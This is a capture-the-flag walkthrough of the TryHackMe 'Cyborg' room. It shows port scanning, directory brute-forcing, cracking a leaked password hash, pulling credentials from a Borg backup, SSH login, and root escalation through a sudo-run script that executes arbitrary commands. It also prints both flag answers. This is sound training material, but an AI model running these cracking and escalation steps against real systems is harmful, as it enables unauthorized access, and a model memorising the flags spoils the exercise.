TryHackMe | Cyborg writeup

This is one (of many) walkthrough for the Cyborg CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws from this article.

Enumeration

As usual, I use nmap to see which ports are open.

nmap -sC -SV $IP-ADDRESS

Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-25 03:02 EST
Nmap scan report for 10.10.163.193
Host is up (0.065s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.39 seconds

From this command, you can answer the first two questions.

1. Scan the machine, how many ports are open? 2
2. What service is running on port 22? ssh

Furthermore, by accessing the web server on port 80 from a browser you notice the existence of a web page. Despite of that page didn’t bring any useful information, you can answer the next question.

3. What service is running on port 80? http (Apache HTTP server)

After reviewing the HTML source code and the request/response headers from the request, I could not find anything to carry on. So, I tried to use gobuster to brute force some URIs.

gobuster dir -u http://10.10.187.217
  \ -x html,txt,js,py,php 
  \-w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt


===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.187.217
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     js,py,php,html,txt
[+] Timeout:        10s
===============================================================
2023/01/11 14:29:41 Starting gobuster
===============================================================
(...)
/admin (Status: 301)
/etc (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
===============================================================
2023/01/11 14:29:44 Finished
===============================================================

From the output, there were two paths that stand out: admin and etc.

1. /admin — this one shows a website about a musician
2. /etc/ — this strange directory has a couple of folders and files. The /etc/squid/passwd seemed to contain some credentials to access something. 🤔

As my curiosity arised I tried to see if there was any format that I could use to crack those credentials. By accessing hashcat index of hash formats I could detect one format.

I tried to use that mode to crack the hash

hashcat -a 0 -m 1600 $apr1$rest-of-the-hash /usr/share/wordlists/rockyou.txt

After waiting some seconds, I was able to crack the password successfully. But where I should use it anyway? There was still missing piece waiting to be explored…the admin page!

I tried to run gobuster against the admin page, but nothing really important came out, except the admin/admin.html page. By the content of the page someone messed up 😂. Again, I noticed the word “music_archive” again. So, it might be something important. Eventually, I accessed the HTML source code I discovered an archive.tar file on it. After downloading it and unpacking the contents, there was some files and folders on it home/field/dev/final_archive.

My first step on this folder was to check the README file.

This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

My first impression was “what the hell is borgbackup?”. I quickly went for a google search and found out that is a backup program. After taking several minutes on the documentation and some experimentation, it seemed that there was a way to discover and extract the contents of repos.

borg extract $TAR_CONTENT_PWD/home/field/dev/final_archive/::music_archive

Surprisingly, I had to insert the password 😄. Using the cracked the password, this command generated some folders, one of them containing a home folder for the user alex.

Whoop! Whoop! I found a very interesting inside Documents with more credentials. Maybe there was an entry point to access the server through ssh.

ssh alex@$IP_ADDRESS

alex@IP_ADDRESS's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


27 packages can be updated.
0 updates are security updates.

alex@ubuntu:~$ 

At this point I could access the first flag.

4. What is the user.txt flag? flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

Privilege escalation

The remaining of the CTF introduced some new challenges. The very first thing to do was to list the commands I was allowed to execute on behalf of alex.

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

There was a script file that standout from the command output. By checking the content of the script, I noticed that it was parsing command line arguments (-c) and executing the command at the very end of the script.

...
# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

As I could execute the script as root, I was able to simply print the file contents in /root/root.txt. The location of the root.txt file was simply intuition. There was no particular reason for it

alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"

5. What is the user.txt flag? flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}

Conclusion

Despite of this CTF was rated as easy, my lack of knowledge and ignorance in several topics prevented me to finish this exercise in a more smooth and faster way. It required some research on my own to make it happen. Additionally, several files oriented me into the wrong direction (for instance the .bash_history file, but also config .dbus and .config files). Kudos to fieldraccoon to create this one! 👍